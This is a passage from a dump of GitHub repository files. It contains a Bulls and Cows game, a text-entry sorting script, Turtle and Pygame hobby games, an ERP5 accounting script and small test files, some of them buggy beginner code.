"text": "# Bulls and Cows\n\nAlso known as Mastermind, this is a classic game in which one attempts to guess a 4-digit code. With every guess, one is told how many digits they guessed correctly and in the right place, and how many digits they guessed correctly, but got in the wrong place. \n\nExample: Let's assume the correct code is 1234. If you guess 1256, you will get the following response:\n\n> Number of digits in the right place: 2\n>\n> Number of digits guessed correctly but in the wrong place: 0\n\nIf you guess 1243, you will get:\n\n> Number of digits in the right place: 2\n>\n> Number of digits guessed correctly but in the wrong place: 2\n\nMost implementations of this game simply tell you that you got \"2 bulls and 2 cows\"; however, I wanted this game to be playable without having read the manual or having any knowledge about the game, so it uses more natural language such as \"Number of digits in the right place\", etc.\n\n### As of July 1, this game is now available in the Arch Linux AUR (Arch User Repository)! \n\nUsers of Arch Linux may use their favorite AUR helper to install the game from the AUR, or manually install it using the AUR build script there. \n"
},
{
"alpha_fraction": 0.6042496562004089,
"alphanum_fraction": 0.6314740777015686,
"avg_line_length": 26.88888931274414,
"blob_id": "f38d0dd71dc12f5e8afef215bda0635ef76f727e",
"content_id": "d5a23dbbed8d0d156ba9f6800ae4e335d5d5c48d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1506,
"license_type": "permissive",
"max_line_length": 247,
"num_lines": 54,
"path": "/bullscows.py",
"repo_name": "hadenodom/Bulls-and-Cows",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport random\ndef passw(numDigits):\n # Returns a string that is numDigits long, made up of unique random digits.\n numbers = list(range(10))\n random.shuffle(numbers)\n secretNum = ''\n for i in range(numDigits):\n secretNum += str(numbers[i])\n return int(secretNum)\npassw = passw(4)\n\n## parse() is a broken function as of Python3. MUSTFIX. \n#def parse(code):\n#\ta = code/1000\n#\tb = (code/100) - (a*10)\n#\tc = (code/10) - ((code/100)*10)\n#\td = code - ((code/10)*10)\n#\treturn a,b,c,d\n\non = 0\nwhile (on != 4):\n\ton = 0\n\tpresent = 0\n\tguess=int(input(\"Guess the 4-digit code:\"))\n\t# inserting str here is a hacky solution; Python3 broke expected behavior of parse() function above (disabled), and list won't accept int input, so int guess and int passwd are converted to strings and then passed to list. VERY HACKY, MUSTFIX. \n\ta,b,c,d = list(str(guess))\n\tA,B,C,D = list(str(passw))\n\twhile a==b or b==c or c==d or a==c or a==d or b==d:\n\t\tprint(\"No digits can repeat!\")\n\t\tguess=int(input(\"Guess the 4-digit code:\"))\n\t\ta,b,c,d = list(str(guess))\n\tif a==A:\n\t\ton+=1\n\tif b==B:\n\t\ton+=1\n\tif c==C:\n\t\ton+=1\n\tif d==D:\n\t\ton+=1\n\tif a==B or a==C or a ==D:\n\t\tpresent+=1\n\tif b==A or b==C or b==D:\n\t\tpresent+=1\n\tif c==A or c==B or c==D:\n\t\tpresent+=1\n\tif d==A or d==B or d==C:\n\t\tpresent+=1\n\tpresent = present\n\tif on==4:\n\t\tprint(\"You guessed correctly!\")\n\telse:\n\t\tprint(\"Number of digits in the right place:\",on)\n\t\tprint(\"Number of digits guessed correctly but in the wrong place:\",present)\n"
}
] | 2 |
MarzellT/naegal | https://github.com/MarzellT/naegal | c12880ceded91f760b69652289301b9a0e124cb4 | c2ead27d795be06c36f9d7cd0f4781ce785ca5dd | 29c474bbc988ffa0e6d8cb49cab20cb8d1a50784 | refs/heads/master | 2020-05-21T11:07:26.305152 | 2019-05-24T12:49:33 | 2019-05-24T12:49:33 | 186,028,703 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5454747080802917,
"alphanum_fraction": 0.5505767464637756,
"avg_line_length": 33.022640228271484,
"blob_id": "d82f4c74a72d962d3473e11c8702712396a04aef",
"content_id": "dba9f1b1822baf9de48d03b761c673fbe028ed41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9016,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 265,
"path": "/naegal.py",
"repo_name": "MarzellT/naegal",
"src_encoding": "UTF-8",
"text": "\"\"\" Docstring: A program to sort entries of a given list.\n\nThis program will search for given keywords in a text file and then uses them\nto list them in entries and print them in a textfile.\n\"\"\"\n\n__author__ = \"Philipp Fischborn ,Tobias Marzell\"\n__credits__ = \"\"\n__email__ = \"[email protected] ,[email protected]\"\n\n\nclass Entry():\n \"\"\" Class that contains the information of the entries. \"\"\"\n def __init__(self, values, row):\n self.value = []\n for i in range(len(values)):\n self.value.append(values[i].strip())\n self.row = row\n\n def getValue(self, x):\n \"\"\" Returns the xth value of the entry. \"\"\"\n return self.value[x]\n\n def getAllValues(self):\n \"\"\" Returns all entries of the entry. \"\"\"\n self.values = []\n for i in range(len(self.value)):\n self.values.append(self.value[i])\n return self.values\n\n def getRow(self):\n \"\"\" Returns the row of the entry. \"\"\"\n return self.row\n\n def __str__(self):\n return str(self.getAllValues())\n\n def __repr__(self):\n return str(self.getAllValues())\n\nclass Count_class():\n \"\"\" This class contains the information of counted entries.\n\n This class will contain all the information of a given rows unique objects\n with their respective keys.\n \"\"\"\n\n def __init__(self, unique_items_row, representant):\n \"\"\" Enter the row index of which the values should be stored. \"\"\"\n self.all_items = []\n self.restricted_items = []\n self.representant = representant\n\n def append_to_all_items(self, item):\n \"\"\" Appends the item to the classes all list. \"\"\"\n self.all_items.append(item)\n\n def append_to_restricted_items(self, item):\n \"\"\" Appends the item to the classes restricted list. \"\"\"\n self.restricted_items.append(item)\n\n def getIndex(self):\n \"\"\" Returns the index of the current Count_class object. \"\"\"\n return self.unique_items_row\n\n def get_all_items(self):\n \"\"\" Returns the items all list. \"\"\"\n return self.all_items\n\n def get_restricted_items(self):\n \"\"\" Returns the items restricted list. \"\"\"\n return self.restricted_items\n\n def getRepresentant(self):\n \"\"\" Returns the name which the class represents. \"\"\"\n return self.representant\n\n \ndef first_line(inputfile):\n \"\"\" Returns the first row of the file. \"\"\"\n file = open(inputfile, \"r\")\n lines = file.readlines()\n line = lines[0]\n return line\n\ndef read_text(inputfile):\n \"\"\" Returns the entire rows of the entire file as list. \"\"\"\n file = open(inputfile, \"r\")\n return file.readlines()\n\ndef get_entry_pos(anal, keywords):\n \"\"\" Returns position of keywords(as list) in the string.\"\"\"\n pos = []\n end = []\n for i in range(len(keywords)):\n pos.append(anal.find(keywords[i]))\n end.append(pos[i] + len(keywords[i]) - 1)\n # Search for beginnig |\n for i in range(len(pos)):\n helpstr = anal\n j = 1\n while True:\n if not helpstr[pos[i] - j] == \"|\":\n j = j + 1\n else:\n break\n pos[i] = pos[i] - j + 1\n # Search for ending |\n for i in range(len(end)):\n helpstr = anal\n j = 1\n while True:\n if not helpstr[end[i] + j] == \"|\":\n j = j + 1\n else:\n break\n end[i] = end[i] + j - 1\n \n return pos, end\n \ndef setup():\n \"\"\" Sets up the text file and the first line. 
\"\"\"\n textfile = input(\"File: \")\n textfile = textfile + \".txt\"\n anal = first_line(textfile)\n keywords = input(\"Keywords (split with ','): \").split(\",\")\n pos, end = get_entry_pos(anal, keywords)\n text = read_text(textfile)\n entries = []\n for i in range(len(text)):\n helpstr = []\n for j in range(len(keywords)):\n helpstr.append(text[i])\n helpstr[j] = helpstr[j][pos[j]:(end[j] + 1)]\n entries.append(Entry(helpstr, text[i]))\n return pos, end, text, entries, keywords, anal\n\ndef getRowitems(entries, x):\n \"\"\" Returns a list of all different items of the row(x) in entries. \"\"\"\n row = []\n for i in range(len(entries)):\n if not entries[i].getValue(x) in row:\n row.append(entries[i].getValue(x))\n\n # Create string with \"-\" or \" \" times the length of the current row\n deleteString1 = \"\"\n deleteString2 = \"\"\n for i in range(len(row[0])):\n deleteString1 += \"-\"\n deleteString2 += \" \"\n # Remove all irrelevant entries.\n temp = row\n i = len(temp)\n while i >= 0:\n if i < len(temp):\n if row[i] == deleteString1 or row[i] == \"\" or row[i] == temp[0] \\\n or row[i] == deleteString2:\n row.pop(i)\n i -= 1\n return row\n\ndef sort_by(entries, first_line):\n \"\"\" Function that returns all blocked entries of the row(number). \"\"\"\n rows = input(\"Enter the index of each row (split with ','): \").\\\n split(\",\")\n key = input(\"Enter the keys to sort by: \")\n returnlist = []\n helplist = []\n returnlist.append(first_line)\n for i in range(len(entries)):\n flag = 0\n for j in range(len(rows)):\n if key == entries[i].getValue(int(rows[j])):\n flag +=1\n if flag == len(rows):\n returnlist.append(entries[i].getRow())\n helplist.append(\"Number of entries: \" + str(len(returnlist)) + \"\\n\")\n returnlist = helplist + returnlist\n return returnlist\n\ndef count_by(entries):\n \"\"\" Function that displays the % of the users inputs blocked entries. \"\"\"\n help = \"Enter the index of the rows which are to be calculated \" + \\\n \"(the first row is the row which will be cycled through, all the\" +\\\n \" following rows are the rows which contain the Keyword. \\nRows: \"\n rows = input(help).split(\",\")\n for i in range(len(rows)):\n rows[i] = int(rows[i])\n key = input(\"Enter the key to look for: \")\n unique_row_items = getRowitems(entries, 0)\n count_row_list = []\n for i in range(len(unique_row_items)):\n count_row_list.append(Count_class(i, unique_row_items[i]))\n for i in range(len(entries) - 1):\n x = 0\n for j in range(len(unique_row_items)):\n if count_row_list[j].getRepresentant() == \\\n entries[i + 1].getValue(0):\n x = j\n count_row_list[x].append_to_all_items([entries[i + 1]])\n k = 1\n flag = 0\n while k < len(rows):\n #print(key, entries[i + 1].getValue(k))\n if not key == entries[i + 1].getValue(rows[k]):\n flag = 1\n k += 1\n if flag == 0:\n count_row_list[x].append_to_restricted_items([entries[i + 1]])\n percentage_list = []\n for i in range(len(count_row_list)):\n if not len(count_row_list[i].get_restricted_items()) == 0:\n percentage_list.append(str([count_row_list[i].getRepresentant(), \\\n (len(count_row_list[i].get_restricted_items())/\\\n len(count_row_list[i].get_all_items()) * 100)])\\\n + \"\\n\")\n else:\n percentage_list.append(str([count_row_list[i]\\\n .getRepresentant(), 0]) + \"\\n\")\n return percentage_list\n\ndef write_to_file(write_string):\n \"\"\" Prints the given string in user input's file. 
\"\"\"\n file = input(\"Enter the file name which you want to save to: \")\n file += \".txt\"\n file = open(file, \"w\", newline = \"\\n\")\n for i in range(len(write_string)):\n file.write(write_string[i])\n file.close()\n\ndef cli(pos, end, text, entries, keywords, rowitems, first_line):\n \"\"\" This is the cli of the program. \"\"\"\n while True:\n print(\"Valid inputs: \\n0: Shows the available rows. \\n\" + \\\n \"1: Writes all the entries which contain a given keyword \" +\n \"in the selected row into a text file. \\n\" +\n \"2: Writes the occurence of a keyword in given rows as % \" +\\\n \"relative to all occurences of the certain row. \\n\" +\n \"Exit with either 'e' or 'exit'.\")\n user_input = input(\"Enter the operation that you want to do: \")\n if user_input == \"0\":\n for i in range(len(pos)):\n print(\"row[\" + str(i) + \"]:\", keywords[i])\n if user_input == \"1\":\n write_to_file(sort_by(entries, first_line))\n if user_input == \"2\":\n write_to_file(count_by(entries))\n if user_input == \"exit\" or user_input == \"e\":\n break\n \n\ndef main():\n \"\"\" Main function. \"\"\"\n pos, end, text, entries, keywords, first_line = setup()\n row_items = []\n for i in range(len(pos)):\n row_items.append(getRowitems(entries, i))\n print(\"row[\" + str(i) + \"]:\", keywords[i])\n\n cli(pos, end, text, entries, keywords, row_items, first_line)\n \n input(\"Exit by pressing enter.\")\n\nif __name__ == '__main__':\n main()\n"
}
] | 1 |
slipslop/GameProjects | https://github.com/slipslop/GameProjects | ad2307e0b2e716fd3b3b505ee2778704f34628bc | ca578142a8a0fc219e85d683ef9c223e7d572ae9 | ffd381b5f14a26f58f3300189e9950c6fdbd7472 | refs/heads/master | 2020-04-02T09:08:40.714031 | 2018-10-31T06:42:10 | 2018-10-31T06:42:10 | 153,582,777 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8311688303947449,
"alphanum_fraction": 0.8311688303947449,
"avg_line_length": 37.5,
"blob_id": "e9f6748708a844b5be14dde535e4cfe67ec55e14",
"content_id": "f6af8340ddcff824f0723cb6608ec63c1e832f71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 2,
"path": "/README.md",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "# GameProjects\nGame projects made with TurtleGraphics and Pygame - libraries\n"
},
{
"alpha_fraction": 0.4998187720775604,
"alphanum_fraction": 0.5353388786315918,
"avg_line_length": 20.83333396911621,
"blob_id": "216511a4a5befbfdc701899110e7558eb07d6a9a",
"content_id": "f4fbcc356e44f6e7d2ce96fa374bb0bb9ffa6461",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2759,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 126,
"path": "/Omatekoinenpeli.py",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "import turtle\nimport math\nimport random\n\n\nwn = turtle.Screen()\nwn.bgcolor(\"black\")\nwn.title(\"Simple Object Motion Template\")\n\nclass Player(turtle.Turtle):\n\n def __init__(self):\n turtle.Turtle.__init__(self)\n self.color(\"white\")\n self.shape(\"triangle\")\n self.penup()\n self.speed(0)\n self.thrust = 1\n self.friction = 0.99\n self.dx = 0\n self.dy = 0\n\n def move(self):\n self.dx *= self.friction\n self.dy *= self.friction\n self.goto(self.xcor()+self.dx, self.ycor()+self.dy)\n\n\n # boundary detection\n if self.xcor() > 350:\n self.setx(350)\n # self.rt(60)\n if self.xcor() < -350:\n self.setx(-350)\n # self.rt(60)\n if self.ycor() > 350:\n self.sety(350)\n # self.rt(60)\n if self.ycor() < -350:\n self.sety(-350)\n # self.rt(60)\n\n def turnleft(self):\n self.left(45)\n def turnright(self):\n self.right(45)\n def accelerate(self):\n h = self.heading()\n self.dx += math.cos(h*math.pi/180)*self.thrust\n self.dy += math.sin(h*math.pi/180)*self.thrust\n\n\nclass Food(turtle.Turtle):\n\n def __init__(self):\n turtle.Turtle.__init__(self)\n self.color(\"red\")\n self.speed(0)\n self.shape(\"square\")\n self.shapesize(stretch_len=0.8, stretch_wid=0.8)\n self.penup()\n self.goto(random.randint(0,300), random.randint(0,300))\n food = []\n for i in range(4):\n food.append(Food)\n\n\n\n\n\n\n\n\nclass Game():\n def __init__(self):\n self.pen = turtle.Turtle()\n\n def draw_border(self):\n # draw border\n self.pen.speed(0)\n self.pen.color(\"white\")\n self.pen.pensize(3)\n self.pen.penup()\n self.pen.goto(-350, 350)\n self.pen.pendown()\n for side in range(4):\n self.pen.fd(700)\n self.pen.rt(90)\n self.pen.penup()\n self.pen.ht()\n self.pen.pendown()\n\ndef is_collision(food, player):\n if (food.xcor() >= (player.xcor() - 20)) and \\\n (food.xcor() <= (player.xcor() + 20)) and \\\n (food.ycor() >= (player.ycor() - 20)) and \\\n (food.ycor() <= (player.ycor() + 20)):\n return True\n else:\n return False\n\n\n\nplayer = Player()\ngame = Game()\ngame.draw_border()\n\nfood = Food()\n\n\nturtle.listen()\nturtle.onkey(player.turnleft, \"Left\")\nturtle.onkey(player.turnright, \"Right\")\nturtle.onkey(player.accelerate, \"Up\")\n\n# wn.tracer(0)\n\nwhile True:\n wn.update()\n player.move()\n\n # collision checking between player and food\n if is_collision(food, player):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n food.goto(x, y)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5564853549003601,
"alphanum_fraction": 0.6014644503593445,
"avg_line_length": 19.80434799194336,
"blob_id": "a1701cb078da877116e01f5e3247b7f15d1db95a",
"content_id": "d8e98039da5f8807bc55b9e2603d9de70b4ad3f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 46,
"path": "/MatopeliPyGame.py",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "# Learning about classes and objects\n\nimport pygame\nimport random\nimport math\nimport tkinter as tk\nfrom tkinter import messagebox\n\n\n\n\n\ndef drawGrid(w, rows, surface):\n sizeBtwn = w // rows\n\n x = 0\n y = 0\n for l in range(rows):\n x = x + sizeBtwn\n y = y + sizeBtwn\n\n pygame.draw.line(surface, (255, 255, 255), (x, 0), (x, w))\n pygame.draw.line(surface, (255, 255, 255), (0, y), (w, y))\n\ndef redrawWindow(surface):\n global rows, width\n surface.fill((0,0,0))\n drawGrid(width, row, surface)\n pygame.display.update()\n\n\ndef main():\n global width, rows\n width = 500\n\n rows = 20\n win = pygame.display.set_mode((width, width)) # its square\n s = snake((255,0,0), (10, 10))\n flag = True\n clock = pygame.time.Clock()\n # main loop\n\n while flag:\n pygame.time.delay(50) # how fast the game is, the lower the faster\n clock.tick(10) # the lower the slower\n redrawWindow(win)"
},
{
"alpha_fraction": 0.5429677367210388,
"alphanum_fraction": 0.5691219568252563,
"avg_line_length": 27.606870651245117,
"blob_id": "3e34635e2fd57945938735a43dbd063316a749fc",
"content_id": "e66d03d020b7ec87e10bf45b36d0f39ec110e82e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7494,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 262,
"path": "/PyGame.py",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "import pygame\nimport time\nimport random\n\npygame.init()\n\ndisplay_width = 800\ndisplay_height = 600\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ndark_red = (200, 0, 0)\nblue = (0, 0, 255)\ndark_blue = (0, 0, 200)\n\ncar_width = 64\n\n\n\npause = False\n\n\ngameDisplay = pygame.display.set_mode((display_width, display_height))\npygame.display.set_caption(\"BittiRalli\")\nclock = pygame.time.Clock()\n\ncarImg = pygame.image.load(\"racecar.png\")\npygame.display.set_icon(carImg) # changes the icon top left\n\ndef blocks_dodged(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Dodged: \" + str(count), True, black)\n gameDisplay.blit(text, (0, 0))\n\n\ndef blocks(blockx, blocky, blockw, blockh, color): # draw a block to dodge\n pygame.draw.rect(gameDisplay, color, [blockx, blocky, blockw, blockh])\n\n\n\ndef car(x,y): # shows the car on screen\n gameDisplay.blit(carImg,(x,y)) # draws to the background, what and where? carImg to x,y\n\n# upleft corner is 0,0. as you add to x you move to right. add To y you move down.\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n\ndef message_display(text):\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(text, largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height/2))\n gameDisplay.blit(TextSurface, TextRectangle) # to draw to screen\n pygame.display.update()\n\n time.sleep(2)\n game_loop() # start game loop again\n\ndef crash():\n# crash function, when crashed, it displays a screen with two buttons play again and quit.\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n gameDisplay.fill(white)\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(\"You Crashed\", largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(TextSurface, TextRectangle)\n\n button(\"Play again\", 150, 450, 100, 50, dark_blue, blue, \"play\")\n button(\"Quit\", 550, 450, 100, 50, dark_red, red, \"quit\")\n\n\n\n pygame.display.update()\n clock.tick(15) # wait 15 secs\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n print(mouse) # debugging\n\n click = pygame.mouse.get_pressed()\n\n\n # makes buttons more interactive\n if x+w> mouse[0] > x and y+h > mouse[1] > y:\n pygame.draw.rect(gameDisplay, ac, (x, y, w, h))\n # plays different action according to the button\n if click[0] == 1 and action != None:\n if action == \"play\":\n game_loop()\n elif action == \"quit\":\n pygame.quit()\n quit()\n elif action == \"unpause\":\n unpause()\n else:\n pygame.draw.rect(gameDisplay, ic, (x, y, w, h))\n\n smallText = pygame.font.Font(\"freesansbold.ttf\", 20)\n textSurf, textRect = text_objects(msg , smallText) # smallText = font\n textRect.center = ((x + (w / 2)), (y + (h / 2))) # x + half of the width , y + half of the height\n gameDisplay.blit(textSurf, textRect)\n\ndef unpause():\n global pause\n pause = False\n\n\ndef paused():\n\n\n\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n gameDisplay.fill(white)\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(\"Paused\", largeText) # run text_objects function\n TextRectangle.center = ((display_width / 
2), (display_height / 2))\n gameDisplay.blit(TextSurface, TextRectangle)\n\n button(\"Continue\", 150, 450, 100, 50, dark_blue, blue, \"unpause\")\n button(\"Quit\", 550, 450, 100, 50, dark_red, red, \"quit\")\n\n\n\n\n\n\n pygame.display.update()\n clock.tick(15) # wait 15 secs\n\n\n# runs one time before game starts\ndef game_intro():\n\n intro = True\n\n while intro:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n gameDisplay.fill(white)\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(\"Bitti Ralli\", largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(TextSurface, TextRectangle)\n\n button(\"Play\", 150, 450, 100, 50, dark_blue, blue, \"play\")\n button(\"Quit\", 550, 450, 100, 50, dark_red, red, \"quit\")\n\n\n\n\n\n\n pygame.display.update()\n clock.tick(15) # wait 15 secs\n\ndef game_loop():\n global pause\n\n x = (display_width * 0.45)\n y = (display_height * 0.7)\n\n dx = 0\n dy = 0\n\n block_startx = random.randrange(0, display_width)\n block_starty = -600\n block_speed = 4\n block_width = 100\n block_height = 100\n dodged = 0\n\n gameExit = False\n\n # main game loop\n while not gameExit:\n\n for event in pygame.event.get(): # event handler\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n dx -= 5\n print(\"x is:\" + str(x)) # debugging also\n if event.key == pygame.K_RIGHT:\n dx += 5\n print(\"x is:\" + str(x)) # debugging also\n if event.key == pygame.K_UP:\n dy -= 4\n print(\"y is: \" + str(y))\n if event.key == pygame.K_DOWN:\n dy += 4\n print(\"y is: \" + str(y))\n if event.key == pygame.K_p:\n pause = True\n paused()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n dx = 0\n if event.key == pygame.K_DOWN or event.key == pygame.K_UP:\n dy = 0\n\n x += dx\n y += dy\n # print(event) # <- debugging purposes\n gameDisplay.fill(white)\n\n # drawing\n blocks(block_startx, block_starty, block_width, block_height, black)\n block_starty += block_speed # makes block move!\n car(x,y)\n blocks_dodged(dodged)\n\n # collision detection car and side borders\n if x > display_width - 55 or x < -10:\n crash() # run crash() function\n # collision between car and bottom border and upper\n if y > 444:\n y = 444\n if y < 28:\n y = 28\n\n # when block goes off the screen, print another at random x\n if block_starty > display_height:\n block_starty = 0 - block_height\n block_startx = random.randrange(0, display_width)\n dodged += 1\n block_speed += 0.25\n print(block_speed)\n print(\"block's x is: \" + str(block_startx))\n\n # collision detection between block and car\n if block_startx < x + car_width and block_startx + block_width > x:\n crash()\n\n\n\n\n pygame.display.update()\n clock.tick(60) # fps\n\n\n#uninitialize Pygame\ngame_intro()\ngame_loop()\npygame.quit()\nquit()"
}
] | 4 |
dystudio/erp5 | https://github.com/dystudio/erp5 | 388736153b06c7e494ed9df9ebb41907fced1768 | 21c4706b134584a129b752d9eb15a5cbae04e885 | 8efbfc197097568aba8afb86c65e3ed071426c3f | refs/heads/master | 2021-01-13T11:40:00.978305 | 2016-12-29T23:04:10 | 2016-12-29T23:04:50 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7523961663246155,
"alphanum_fraction": 0.7539936304092407,
"avg_line_length": 30.299999237060547,
"blob_id": "73ba5447558f757eb5e41c959b4bcf14efac3fa1",
"content_id": "6aa0053c400a91f94072fb82c168142eaa988822",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1252,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 40,
"path": "/bt5/erp5_travel_expense/SkinTemplateItem/portal_skins/erp5_hr_request/ExpenseValidationRequest_createPurchaseTransaction.py",
"repo_name": "dystudio/erp5",
"src_encoding": "UTF-8",
"text": "portal = context.getPortalObject()\nstate = context.getSimulationState()\nif (state not in ('accepted')):\n from zExceptions import Unauthorized\n raise Unauthorized\n\nmission_account, debt_account = portal.ERP5Site_getPreferredExpenseAccountTuple()\nif not mission_account:\n context.Base_redirect('view',\n keep_items=dict(\n portal_status_message=portal.Base_translateString(\n \"No Account has been defined for Expenses Transactions\",\n ),\n )\n )\n\ntransaction = portal.accounting_module.newContent(\n portal_type=\"Purchase Invoice Transaction\",\n title=\"\"\"Frais %s\"\"\" % (context.getReference()), \n source_section=context.getDestinationDecision(),\n source_project=context.getSourceProject(),\n destination_section=context.getDestinationSection(),\n resource=context.getPriceCurrency(),\n created_by_builder=1, # XXX this prevent init script from creating lines.\n start_date=DateTime().earliestTime(),\n)\n\ntransaction.newContent(\n portal_type='Purchase Invoice Transaction Line',\n destination=mission_account,\n quantity= (float(context.getTotalPrice())),\n)\n\ntransaction.newContent(\n portal_type='Purchase Invoice Transaction Line',\n destination=debt_account,\n quantity=(-float(context.getTotalPrice())),\n)\n\ntransaction.stop()\n"
}
] | 1 |
StephRoro/hello | https://github.com/StephRoro/hello | e46a98c0d405f8f527e34dc43187137250925e7d | 8aabe592ea2cb07b1bfc86d7d28f30cba255a52a | 42f1bc16e9424974d7592c2ac3564a9d89a603d8 | refs/heads/master | 2023-08-27T17:34:32.687979 | 2021-11-15T15:47:44 | 2021-11-15T15:47:44 | 428,314,195 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5719557404518127,
"alphanum_fraction": 0.5719557404518127,
"avg_line_length": 18.846153259277344,
"blob_id": "4b21d0072f0326562fc27a91949301602eab5066",
"content_id": "90ae9aedb40ee1f727376b2286e6c0e4c3023c4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 13,
"path": "/mlproject/lib.py",
"repo_name": "StephRoro/hello",
"src_encoding": "UTF-8",
"text": "# mlproject/lib.py\n\ndef hello_world():\n return \"Hello world from mlproject\"\n\n\ndef try_me() :\n print(\"tell me what the fuck\")\n result=input()\n if result == what the fuck:\n print(\"tkt frero\")\n else:\n print(\"tell me what the fuck\")\n \n \n"
},
{
"alpha_fraction": 0.6940298676490784,
"alphanum_fraction": 0.7238805890083313,
"avg_line_length": 21.33333396911621,
"blob_id": "6b81d1dd85316bf3303ffe340c82a00e3511ad20",
"content_id": "8e9f55ffb5c744ca97cd02aced365735f91ad584",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 6,
"path": "/tests/test_distance.py",
"repo_name": "StephRoro/hello",
"src_encoding": "UTF-8",
"text": "# tests/test_lib.py\nfrom mlproject.distance import haversine\n\n\ndef test_type_distance():\n assert type(haversine(2,3,4,5)) == float\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5036231875419617,
"avg_line_length": 18.714284896850586,
"blob_id": "49d30fd682f91a1a686b8b37a1a13344e1f5004b",
"content_id": "cbb846821bb978d1529db048bd0392dcb7b710d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 14,
"path": "/scripts/mlproject-run",
"repo_name": "StephRoro/hello",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef try_me() :\n print(\"tell me what the fuck\")\n result=input()\n if result == \"what the fuck\":\n print(\"tkt frero\")\n else:\n print(\"tell me what the fuck\")\n \n \nif __name__ == \"__main__\":\n\ttry_me()\n"
}
] | 3 |
sota-takahashi0731/bachelor | https://github.com/sota-takahashi0731/bachelor | 25a618366983e366ea87304fd05a2d03ff823105 | 4c965b9209b261c78c2f04d987b23ddaa964074d | 3fce40e6539fac654563878f4c3fb476abe812b0 | refs/heads/master | 2023-03-08T16:06:17.987592 | 2021-02-25T14:34:41 | 2021-02-25T14:34:41 | 342,269,900 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5792235136032104,
"alphanum_fraction": 0.5970619320869446,
"avg_line_length": 35.653846740722656,
"blob_id": "7c8845198222383e383ea465b9fb98045e2500ae",
"content_id": "7947c20b7f6fd9767831e5c68a6e844ad2030d2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3904,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 104,
"path": "/code/EDA_peakdetection.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
